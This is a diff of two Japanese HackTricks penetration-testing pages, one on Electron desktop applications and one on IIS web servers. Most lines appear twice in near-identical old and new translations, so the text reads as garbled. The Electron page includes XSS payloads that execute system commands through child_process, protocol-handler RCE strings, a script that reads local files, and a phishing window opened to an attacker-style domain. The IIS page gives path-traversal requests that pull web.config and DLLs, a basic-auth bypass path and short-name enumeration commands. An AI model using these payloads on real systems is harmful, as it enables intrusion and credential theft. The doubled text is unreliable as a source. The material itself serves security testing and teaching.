- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)をフォローする
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**盗難マルウェア**による企業や顧客の**侵害**をチェックするための**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
## Introduction
Electron は **NodeJS** を使用したローカルバックエンドと **Chromium** を使用したフロントエンドを組み合わせていますが、現代のブラウザのセキュリティメカニズムがいくつか欠けています。
Electronは、ローカルバックエンド(**NodeJS**)とフロントエンド(**Chromium**を組み合わせていますが、現代のブラウザのセキュリティメカニズムがいくつか欠けています。
通常、electronアプリのコードは `.asar` アプリケーション内にあり、コードを取得するにはそれを抽出する必要があります:
通常、Electronアプリのコードは`.asar`アプリケーション内にあり、コードを取得するにはそれを抽出する必要があります:
```bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file
@ -31,10 +45,10 @@ Electronアプリのソースコード内の`packet.json`には、セキュリ
```
Electronには2つのプロセスタイプがあります
* メインプロセスNodeJSへの完全アクセス権を持つ
* メインプロセスNodeJSへの完全アクセス権を持つ)
* レンダラープロセスセキュリティ上の理由からNodeJSへのアクセスが制限されている必要があります
![](<../../../.gitbook/assets/image (307) (5) (1).png>)
![](<../../../.gitbook/assets/image (179).png>)
**レンダラープロセス**はファイルを読み込むブラウザウィンドウになります:
```javascript
@ -44,20 +58,20 @@ let win = new BrowserWindow();
//Open Renderer Process
win.loadURL(`file://path/to/index.html`);
```
**Renderer process**の**設定**は、main.jsファイル内の**main process**で**構成**することができます。設定が**適切に構成されている**場合、いくつかの設定はElectronアプリケーションがRCEを取得するのを**防ぐ**ことができます
**レンダラープロセス**の設定は、main.jsファイル内の**メインプロセス**で**構成できます**。設定が**正しく構成されている**場合、いくつかの構成はElectronアプリケーションがRCEを取得するのを**防ぎます**
Electronアプリケーションは、Node APIを介してデバイスにアクセスする可能性がありますが、それを防ぐように**構成**することができます:
Electronアプリケーションは、Node APIを介してデバイスにアクセスできますが、それを防ぐように構成できます:
- **`nodeIntegration`** - デフォルトでは`off`です。`on`にすると、renderer processからNodeの機能にアクセスできます。
- **`contextIsolation`** - デフォルトでは`on`です。`off`にすると、mainとrendererプロセスが分離されません。
- **`nodeIntegration`** - デフォルトでは`off`です。有効にすると、レンダラープロセスからNodeの機能にアクセスできます。
- **`contextIsolation`** - デフォルトでは`on`です。無効にすると、メインプロセスとレンダラープロセスが分離されません。
- **`preload`** - デフォルトでは空です。
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - デフォルトではoffです。これにより、NodeJSが実行できるアクションが制限されます。
- [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - デフォルトではオフです。これにより、NodeJSが実行できるアクションが制限されます。
- WorkersでのNode Integration
- **`nodeIntegrationInSubframes`** - デフォルトでは`off`です。
- **`nodeIntegration`**が**有効**になっている場合、これによりElectronアプリケーション内のiframe**読み込まれるWebページ**で**Node.js API**を使用できます。
- **`nodeIntegration`**が**無効**になっている場合、preloadはiframe内で読み込まれます。
- **`nodeIntegration`**が**有効**になっている場合、これによりElectronアプリケーション内の**iframe**読み込まれるWebページで**Node.js API**を使用できます。
- **`nodeIntegration`**が**無効**になっている場合、プリロードはiframe内に読み込まれます。
設定の例:
構成の例:
```javascript
const mainWindowOptions = {
title: 'Discord',
@ -83,7 +97,7 @@ spellcheck: true
}
};
```
以下は[こちら](https://7as.es/electron/nodeIntegration\_rce.txt)からの**RCE payloads**です:
いくつかの**RCE payloads**は[こちら](https://7as.es/electron/nodeIntegration\_rce.txt)から取得できます:
```html
Example Payloads (Windows):
<img src=x onerror="alert(require('child_process').execSync('calc').toString());">
@ -119,7 +133,7 @@ require('child_process').exec('calc');
top.require('child_process').exec('open /System/Applications/Calculator.app');
</script>
```
<figure><img src="../../../.gitbook/assets/image (5) (4).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../.gitbook/assets/image (1107).png" alt=""><figcaption></figcaption></figure>
## RCE: preload
@ -165,11 +179,11 @@ _**contextIsolation**_ は、**Web ページのスクリプトと JavaScript Ele
コンテキストが分離されていない場合、攻撃者は次のことができます:
1. **レンダラー内で任意の JavaScript を実行**XSS または外部サイトへのナビゲーション)
2. preload または Electron の内部コードで使用される**組み込みメソッドを上書き**
2. preload または Electron の内部コードで使用される **組み込みメソッドを上書き**
3. **上書きされた関数の使用をトリガー**
4. RCE
組み込みメソッドを上書きできる場所は 2 か所ありますpreload コードまたは Electron の内部コード:
組み込みメソッドを上書きできる場所は 2 か所ありますpreload コードまたは Electron の内部コード
{% content-ref url="electron-contextisolation-rce-via-preload-code.md" %}
[electron-contextisolation-rce-via-preload-code.md](electron-contextisolation-rce-via-preload-code.md)
@ -185,30 +199,30 @@ _**contextIsolation**_ は、**Web ページのスクリプトと JavaScript Ele
### クリックイベントのバイパス
リンクをクリックする際に制限が適用されている場合、通常の左クリックではなく**ミドルクリック**を行うことでそれらをバイパスできるかもしれません
リンクをクリックする際に制限が適用されている場合、通常の左クリックではなく **中クリック** を行うことでそれらをバイパスできるかもしれません
```javascript
window.addEventListener('click', (e) => {
```
## shell.openExternalを介したRCE
この例についての詳細は、[https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8)と[https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)を確認してください。
この例についての詳細は、[https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8](https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8)と[https://benjamin-altpeter.de/shell-openexternal-dangers/](https://benjamin-altpeter.de/shell-openexternal-dangers/)を参照してください。
Electronデスクトップアプリケーションを展開する際、`nodeIntegration``contextIsolation`の正しい設定を確保することが重要です。これらの設定が適切に行われている場合、preloadスクリプトやElectronのメインプロセスからの**クライアントサイドリモートコード実行RCE**が効果的に防止されることが確立されています。
ユーザーがリンクに対話したり新しいウィンドウを開いたりする際に、特定のイベントリスナーがトリガーされ、これらはアプリケーションのセキュリティと機能性にとって重要です。
ユーザーがリンクに対話したり新しいウィンドウを開いたりする、特定のイベントリスナーがトリガーされ、これらはアプリケーションのセキュリティと機能性にとって重要です。
```javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}
```
これらのリスナーは、デスクトップアプリケーションによって**オーバーライド**され、独自の**ビジネスロジック**を実装します。アプリケーションは、ナビゲートされたリンクを内部で開くか外部のWebブラウザで開くかを評価します。この決定は通常、`openInternally`という関数を介して行われます。この関数が`false`を返す場合、リンクは外部で開かれるべきであり、`shell.openExternal`関数を利用します。
これらのリスナーは、デスクトップアプリケーションによって**オーバーライド**され、独自の**ビジネスロジック**を実装します。アプリケーションは、ナビゲートされたリンクを内部で開くか外部のWebブラウザで開くかを評価します。この決定は通常、`openInternally`という関数を介して行われます。この関数が`false`を返すと、リンクは`shell.openExternal`関数を使用して外部で開かれるべきであることを示します。
**以下は簡略化された疑似コードです:**
![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)
![https://miro.medium.com/max/1400/1\*iqX26DMEr9RF7nMC1ANMAA.png](<../../../.gitbook/assets/image (258).png>)
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (620).png>)
![https://miro.medium.com/max/1400/1\*ZfgVwT3X1V\_UfjcKaAccag.png](<../../../.gitbook/assets/image (960).png>)
Electron JSのセキュリティベストプラクティスでは、`openExternal`関数を使用して信頼されていないコンテンツを受け入れることを避けることが推奨されています。これは、さまざまなプロトコルを介したRCEにつながる可能性があるためです。オペレーティングシステムは、RCEを引き起こす可能性のあるさまざまなプロトコルをサポートしています。このトピックに関する詳細な例や説明については、[このリソース](https://positive.security/blog/url-open-rce#windows-10-19042)を参照してください。このリソースには、この脆弱性を悪用することができるWindowsプロトコルの例が含まれています。
Electron JSのセキュリティベストプラクティスでは、`openExternal`関数信頼されていないコンテンツを受け入れることを避けることが推奨されています。これは、さまざまなプロトコルを介してRCEにつながる可能性があるためです。オペレーティングシステムは、この脆弱性を悪用する可能性のあるさまざまなプロトコルをサポートしています。このトピックに関する詳細な例や説明については、[このリソース](https://positive.security/blog/url-open-rce#windows-10-19042)を参照してください。このリソースには、この脆弱性を悪用する可能性のあるWindowsプロトコルの例が含まれています。
**Windowsプロトコルの脆弱性の例には、次のものがあります:**
```html
@ -226,11 +240,11 @@ window.open("ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResu
```
## 内部ファイルの読み取りXSS + contextIsolation
**`contextIsolation`を無効にすると、`<webview>`タグを使用**できるようになり、`<iframe>`と同様に、ローカルファイルの読み取りと情報の持ち出しが可能になります。提供された例では、この脆弱性を悪用して内部ファイルの内容を読み取る方法が示されています:
**`contextIsolation`を無効にすると、`<iframe>`と同様に`<webview>`タグを使用**して、ローカルファイルの読み取りと情報の外部への送信が可能になります。提供された例は、この脆弱性を悪用して内部ファイルの内容を読み取る方法を示しています:
![](../../../.gitbook/assets/1-u1jdryuwaevwjmf_f2ttjg.png)
![](<../../../.gitbook/assets/1 u1jdRYuWAEVwJmf_F2ttJg (1).png>)
さらに、Electronデスクトップアプリケーションにおける**内部ファイルの読み取り**の別の方法が共有されており、アプリケーションを悪用してデータを持ち出すためにスクリプトを注入する方法が強調されています:
さらに、Electronデスクトップアプリケーションにおける**内部ファイルの読み取り**の別の方法が共有されており、アプリケーションを悪用してデータを外部に送信するスクリプトを注入する方法が強調されています:
```html
<br><BR><BR><BR>
<h1>pwn<br>
@ -241,21 +255,21 @@ function j(){alert('pwned contents of /etc/hosts :\n\n '+frames[0].document.body
```
## **RCE: XSS + 古い Chromium**
アプリケーションで使用されている **Chromium****古い** 場合、それには **既知の脆弱性** があるかもしれません。その場合、**XSS を介して RCE を取得する**ことが可能になるかもしれません。\
アプリケーションで使用されている **Chromium****古い** と、その中に **既知の脆弱性** がある場合、**XSS を介して RCE を取得する**ことが可能になるかもしれません。\
この **writeup** で例を見ることができます: [https://blog.electrovolt.io/posts/discord-rce/](https://blog.electrovolt.io/posts/discord-rce/)
## **内部 URL 正規表現バイパスを介した XSS フィッシング**
XSS を見つけたが、**RCE をトリガーできず内部ファイルを盗むことができない**場合、それを使用して **フィッシングを介して資格情報を盗む**ことを試してみることができます。
XSS を見つけたが、**RCE をトリガーできず内部ファイルを盗むことができない** 場合、それを使用して **フィッシングを通じて資格情報を盗む** ことを試してみることができます。
まず、フロントエンドの JS コードをチェックして、新しい URL を開こうとすると何が起こるかを知る必要があります:
まず、新しい URL を開こうとすると何が起こるかを知るために、フロントエンドの JS コードをチェックする必要があります:
```javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {} // opens the custom openInternally function (it is declared below)
```
**`openInternally`**の呼び出しは、そのリンクがプラットフォームに属するリンクであるため、**デスクトップウィンドウ**で開かれるか、**サードパーティのリソースとして**ブラウザで開かれるかを決定します。
関数によって使用される**正規表現**が**バイパスされやすい**場合(たとえば、**サブドメインのドットをエスケープしない**場合、攻撃者はXSSを悪用して、ユーザーに**資格情報を要求する**攻撃者のインフラストラクチャにある**新しいウィンドウを開く**ことができます。
関数によって使用される**正規表現**が**バイパスに脆弱**である場合(たとえば、**サブドメインのドットをエスケープしていない**場合、攻撃者はXSSを悪用して、**ユーザーに資格情報を要求する**攻撃者のインフラストラクチャにある**新しいウィンドウを開く**ことができます。
```html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
@ -263,14 +277,14 @@ window.open("<http://subdomainagoogleq.com/index.html>")
```
## **ツール**
* [**Electronegativity**](https://github.com/doyensec/electronegativity) は、Electronベースのアプリケーションでの設定ミスセキュリティアンチパターンを特定するためのツールです。
* [**Electronegativity**](https://github.com/doyensec/electronegativity) は、Electronベースのアプリケーションでの設定ミスセキュリティアンチパターンを特定するためのツールです。
* [**Electrolint**](https://github.com/ksdmitrieva/electrolint) は、Electronアプリケーション用のオープンソースのVS Codeプラグインで、Electronegativityを使用します。
* [**nodejsscan**](https://github.com/ajinabraham/nodejsscan) は、脆弱なサードパーティライブラリをチェックするためのツールです。
* [**Electro.ng**](https://electro.ng/):購入が必要です
## ラボ
[https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) で、脆弱なElectronアプリを悪用するためのラボを見つけることができます。
[https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s) には、脆弱なElectronアプリを悪用するためのラボがあります。
ラボで役立ついくつかのコマンド:
```bash
@ -305,16 +319,28 @@ npm start
* Electronセキュリティに関するさらなる研究と解説は[https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)で確認できます。
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong>!</strong></summary>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**を使って、ゼロからAWSハッキングをマスターしましょう</strong></summary>
HackTricksをサポートする他の方法:
HackTricksをサポートする他の方法
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスウォッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)を**フォロー**する。
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**フォローする。**
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
</details>

129
network-services-pentesting/pentesting-web/iis-internet-information-services.md
View file

@ -2,28 +2,42 @@
<details>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>**でゼロからヒーローまでAWSハッキングを学ぶ**</strong></a><strong></strong></summary>
<summary><strong>**htARTEHackTricks AWS Red Team Expert**</strong>を使って、**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
HackTricks をサポートする他の方法:
HackTricksをサポートする他の方法:
* **HackTricks で企業を宣伝したい**または**HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)で**フォロー**する
* **ハッキングトリックを共有するには、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
- **HackTricksで企業を宣伝**したい場合や**HackTricksをPDFでダウンロード**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
- [**公式PEASSHackTricksスワッグ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)で**フォロー**する
- **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
</details>
実行可能ファイルの拡張子をテストします:
## WhiteIntel
* asp
* aspx
* config
* php
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、**企業やその顧客が** **スティーラーマルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
{% embed url="https://whiteintel.io" %}
---
テスト実行可能なファイル拡張子:
- asp
- aspx
- config
- php
## 内部IPアドレスの漏洩
302を受け取る任意のIISサーバーでは、Hostヘッダーを削除してHTTP/1.0を使用し、レスポンス内のLocationヘッダーが内部IPアドレスを指す可能性があります。
302を受け取る任意のIISサーバーで、Hostヘッダーを削除してHTTP/1.0を使用し、レスポンス内のLocationヘッダーが内部IPアドレスを指す可能性があります
```
nc -v domain.com 80
openssl s_client -connect domain.com:443
@ -41,9 +55,9 @@ X-FEServer: NHEXCHANGE2016
```
## .configファイルの実行
.configファイルをアップロードしてコードを実行することができます。その方法の1つは、HTMLコメント内にコードをファイルの末尾に追加することです[ここから例をダウンロード](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
.configファイルをアップロードし、それらを使用してコードを実行することができます。これを行う方法の1つは、HTMLコメント内にコードをファイルの末尾に追加することです[ここから例をダウンロード](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
この脆弱性を悪用するための詳細やテクニックについては、[こちら](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)を参照してください
この脆弱性を悪用するための詳細情報やテクニックは[こちら](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)にあります
## IISディスカバリーブルートフォース
@ -51,7 +65,7 @@ X-FEServer: NHEXCHANGE2016
{% file src="../../.gitbook/assets/iisfinal.txt" %}
以下のリストの内容をマージして作成されました:
このリストは、以下のリストの内容をマージして作成されました:
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
@ -60,7 +74,7 @@ X-FEServer: NHEXCHANGE2016
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
拡張子を追加せずに使用してください。必要なファイルにはすでに拡張子が付いています。
拡張子を追加せずに使用してください。必要なファイルにはすでに追加されています。
## パストラバーサル
@ -69,13 +83,12 @@ X-FEServer: NHEXCHANGE2016
詳細な解説はこちらを参照してください:[https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
{% hint style="info" %}
要約すると、アプリケーションのフォルダ内には、"assemblyIdentity"ファイルと"namespaces"への参照が含まれる複数のweb.configファイルがあります。この情報を使用すると、**実行可能ファイルの場所**を知ることができ、それらをダウンロードできます。\
ダウンロードしたDllからは、**新しい名前空間**を見つけることも可能であり、アクセスしてweb.configファイルを取得して新しい名前空間とassemblyIdentityを見つけるべきです。\
また、**connectionstrings.config**ファイルと**global.asax**ファイルには興味深い情報が含まれているかもしれません。
要約すると、アプリケーションのフォルダ内には、"assemblyIdentity"ファイルと"namespaces"への参照が含まれる複数のweb.configファイルがあります。この情報を使用すると、**実行可能ファイルがどこにあるか**を知ることができます。\
**ダウンロードしたDll**からは、**新しい名前空間**を見つけることができ、アクセスしてweb.configファイルを取得し、新しい名前空間とassemblyIdentityを見つけることができます。\
また、ファイル**connectionstrings.config**と**global.asax**には興味深い情報が含まれているかもしれません。\\
{% endhint %}
**.Net MVCアプリケーション**では、**web.config**ファイルが、**"assemblyIdentity"** XMLタグを介してアプリケーションが依存する各バイナリファイルを指定する重要な役割を果たします。
**.Net MVCアプリケーション**では、**web.config**ファイルが、**"assemblyIdentity"** XMLタグを介してアプリケーションが依存する各バイナリファイルを指定することで重要な役割を果たします。
### **バイナリファイルの探索**
@ -86,35 +99,35 @@ Host: example-mvc-application.minded
```
このリクエストは、さまざまな設定や依存関係を明らかにします:
- **EntityFramework** バージョン
- web ページ、クライアント検証、JavaScript の **AppSettings**
- 認証とランタイムのための **System.web** 構成
- **System.webServer** モジュールの設定
- **Microsoft.Owin**、**Newtonsoft.Json**、**System.Web.Mvc** などの多くのライブラリに対する **Runtime** アセンブリのバインディング
* **EntityFramework** バージョン
* web ページ、クライアント検証、JavaScript の **AppSettings**
* 認証とランタイムのための **System.web** 構成
* **System.webServer** モジュールの設定
* **Microsoft.Owin**、**Newtonsoft.Json**、**System.Web.Mvc** などの多くのライブラリに対する **Runtime** アセンブリのバインディング
これらの設定により、**/bin/WebGrease.dll** などの特定のファイルがアプリケーションの /bin フォルダに存在することが示されます。
これらの設定は、**/bin/WebGrease.dll** のような特定のファイルがアプリケーションの /bin フォルダに存在することを示しています。
### **ルートディレクトリのファイル**
**/global.asax** や **/connectionstrings.config**(機密性の高いパスワードが含まれる)などルートディレクトリにあるファイルは、アプリケーションの構成と動作に不可欠です。
**/global.asax** や**/connectionstrings.config**(機密性の高いパスワードが含まれる)などルートディレクトリにあるファイルは、アプリケーションの構成と動作に不可欠です。
### **名前空間と Web.Config**
MVC アプリケーションでは、各ファイルで繰り返し宣言を避けるために、特定の名前空間用の追加の **web.config ファイル** も定義されています。別の **web.config** をダウンロードするリクエストの例が示されています。
MVC アプリケーションでは、各ファイルで繰り返し宣言を避けるために、特定の名前空間用の追加の **web.config ファイル** も定義されます。別の **web.config** をダウンロードするリクエストの例が示されています。
```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
```
### **DLLのダウンロード**
カスタム名前空間の言及は、/binディレクトリに存在する "**WebApplication1**" というDLLを示しています。これに続いて、**WebApplication1.dll** をダウンロードするリクエストが表示されます:
カスタム名前空間の言及は、/binディレクトリに存在する "**WebApplication1**" というDLLを示しています。これに続いて、**WebApplication1.dll** をダウンロードするリクエストが表示されます:
```markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
```
これは、/binディレクトリに**System.Web.Mvc.dll**や**System.Web.Optimization.dll**などの他の重要なDLLが存在している可能性を示しています。
DLLが**WebApplication1.Areas.Minded**という名前空間をインポートするシナリオでは、攻撃者は**/area-name/Views/**などの予測可能なパスに他のweb.configファイルが存在することを推測する可能性があります。これらのweb.configファイルには、/binフォルダ内の他のDLLへの特定の構成と参照が含まれています。例えば、**/Minded/Views/web.config**へのリクエストは、別のDLLである**WebApplication1.AdditionalFeatures.dll**の存在を示す構成と名前空間を明らかにする可能性があります。
DLLが**WebApplication1.Areas.Minded**という名前空間をインポートするシナリオでは、攻撃者は他のweb.configファイルが予測可能なパスたとえば**/area-name/Views/**)に存在し、/binフォルダ内の他のDLLへの参照や特定の構成を含む可能性があることを推測するかもしれません。例えば、**/Minded/Views/web.config**へのリクエストは、**WebApplication1.AdditionalFeatures.dll**という別のDLLの存在を示す構成と名前空間を明らかにする可能性があります。
### 一般的なファイル
@ -199,31 +212,31 @@ C:\xampp\tomcat\conf\server.xml
もし以下のようなエラーが表示された場合:
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png>)
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
それはサーバーが**正しいドメイン名を受信していない**ことを意味します。\
それはサーバーが**Hostヘッダー内に正しいドメイン名を受信しなかった**ことを意味します。\
Webページにアクセスするためには、提供された**SSL証明書**を確認して、そこにドメイン/サブドメイン名が見つかるかもしれません。見つからない場合は、**正しいものを見つけるまでVHostsをブルートフォース**する必要があります。
## 古いIISの脆弱性の調査価値があるもの
## 古いIISの脆弱性の価値があるもの
### Microsoft IISチルダ文字“\~”脆弱性/機能 - 短いファイル/フォルダ名の開示
### Microsoft IISチルダ文字“\~”脆弱性/機能 短いファイル/フォルダ名の開示
この**技術**を使用して、発見されたすべてのフォルダ内のフォルダとファイルを**列挙**できます(基本認証が必要な場合でも)。\
この技術の主な制限は、サーバーが脆弱場合に**各ファイル/フォルダの名前の最初の6文字とファイルの拡張子の最初の3文字までしか見つけられない**ことです。
この**技術**を使用して、発見されたフォルダ内のフォルダとファイルを**列挙**してみることができます(基本認証が必要な場合でも)。\
この技術の主な制限は、サーバーが脆弱である場合に**各ファイル/フォルダの名前の最初の6文字とファイルの拡張子の最初の3文字までしか見つけることができない**ことです。
この脆弱性をテストするために[https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)を使用できます:`java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
![](<../../.gitbook/assets/image (183).png>)
![](<../../.gitbook/assets/image (841).png>)
元の研究: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
**Metasploit**も使用できます: `use scanner/http/iis_shortname_scanner`
### 基本認証バイパス
### 基本認証バイパス
**基本認証IIS 7.5**をバイパスして、次のようにアクセスを試みます:`/admin:$i30:$INDEX_ALLOCATION/admin.php`または`/admin::$INDEX_ALLOCATION/admin.php`
この脆弱性と前述のものを組み合わせて、新しい**フォルダ**を見つけて**認証をバイパス**することができます。
この脆弱性と前述のものを**組み合わせて**、新しい**フォルダ**を見つけて**認証をバイパス**することができます。
## ASP.NET Trace.AXD有効なデバッグ
@ -231,7 +244,7 @@ ASP.NETにはデバッグモードがあり、そのファイルは`trace.axd`
これは、一定期間にわたってアプリケーションに対して行われたすべてのリクエストの非常に詳細なログを保持します。
